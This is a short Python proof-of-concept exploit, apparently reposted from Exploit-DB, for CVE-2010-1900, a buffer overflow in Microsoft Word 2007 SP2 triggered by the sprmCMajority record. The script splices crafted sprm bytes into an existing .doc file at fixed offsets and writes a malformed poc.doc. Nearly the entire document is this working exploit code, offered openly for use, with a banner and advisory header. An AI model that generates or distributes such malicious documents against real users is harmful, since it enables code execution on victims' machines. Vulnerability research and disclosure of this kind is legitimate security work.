''' |
__ __ ____ _ _ ____ |
| \/ |/ __ \ /\ | | | | _ \ |
| \ / | | | | / \ | | | | |_) | |
| |\/| | | | |/ /\ \| | | | _ < |
| | | | |__| / ____ \ |__| | |_) | |
|_| |_|\____/_/ \_\____/|____/ |
|
http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/ |
http://www.exploit-db.com/sploits/moaub-11-exploit.zip |
''' |
|
''' |
Title : Microsoft Office Word sprmCMajority buffer overflow |
Version : Word 2007 SP 2 |
Analysis : http://www.abysssec.com |
Vendor : http://www.microsoft.com |
Impact : Critical |
Contact : shahin [at] abysssec.com , info [at] abysssec.com |
Twitter : @abysssec |
CVE : CVE-2010-1900 |
|
''' |
|
import sys |
|
def main(): |
|
try : |
fdR = open ( 'src.doc' , 'rb+' ) |
strTotal = fdR.read() |
str1 = strTotal[: 4082 ] |
str2 = strTotal[ 4088 :] |
|
sprmCMajority = "\x47\xCA\xFF" # sprmCMajority |
sprmPAnld80 = "\x3E\xC6\xFF" # sprmPAnld80 |
|
fdW = open ( 'poc.doc' , 'wb+' ) |
fdW.write(str1) |
fdW.write(sprmCMajority) |
fdW.write(sprmPAnld80) |
fdW.write(str2) |
|
fdW.close() |
fdR.close() |
print '[-] Word file generated' |
except IOError: |
print '[*] Error : An IO error has occurred' |
print '[-] Exiting ...' |
sys.exit( - 1 ) |
|
if __name__ = = '__main__' : |
main() |
0 条评论。